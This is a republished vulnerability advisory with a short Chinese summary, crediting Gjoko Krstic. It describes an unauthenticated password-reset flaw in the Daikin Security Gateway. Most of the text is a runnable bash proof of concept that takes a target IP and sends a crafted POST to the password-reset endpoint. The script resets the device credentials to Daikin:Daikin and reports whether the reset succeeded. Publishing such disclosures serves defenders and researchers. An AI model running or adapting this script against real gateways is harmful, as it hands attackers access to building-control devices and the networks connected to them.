Daikin Security Gateway 14 Remote Password Reset
Daikin安全网关存在远程密码重置漏洞,攻击者可利用API端点绕过认证机制,将系统密码重置为默认值"Daikin:Daikin",从而获得未经授权的访问权限。该漏洞由Gjoko 'LiquidWorm' Krstic于2025年3月发现并公开。 2025-5-3 21:54:35 Author: cxsecurity.com(查看原文) 阅读量:10 收藏

Daikin Security Gateway 14 Remote Password Reset

# Daikin Security Gateway 214 - Remote Password Reset # Vendor: Daikin Industries, Ltd. # Product web page: https://www.daikin.com # https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html # Affected version: App: 100, Frm: 214 # # Summary: The Security gateway allows the iTM and LC8 controllers # to connect through the Security gateway to the Daikin Cloud Service. # Instead of sending the report to the router directly, the iTM or # LC8 controller sends the report to the Security gateway first. The # Security gateway transforms the report format from http to https # and then sends the transformed https report to the Daikin Cloud # Service via the router. Built-in LAN adapter enabling online control. # # Desc: The Daikin Security Gateway exposes a critical vulnerability # in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated # attacker can send a crafted POST request to this endpoint, bypassing # authentication mechanisms. Successful exploitation resets the system # credentials to the default Daikin:Daikin username and password combination. # This allows attackers to gain unauthorized access to the system without # prior credentials, potentially compromising connected devices and networks. # # Tested on: fasthttp # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2025-5931 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php # # # 21.03.2025 # [ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; } TARGET_IP="$1" URL="https://$TARGET_IP/api/settings/password/reset" PAYLOAD="t00t" [[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; } RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null) [ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; } if [[ $RESPONSE =~ \"Error\":0 ]]; then echo "Reset worked! Vulnerable." elif [[ $RESPONSE =~ \"Error\":1 ]]; then echo "Not vulnerable." else echo "Got: $RESPONSE" fi



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2025050010
如有侵权请联系:admin#unsafe.sh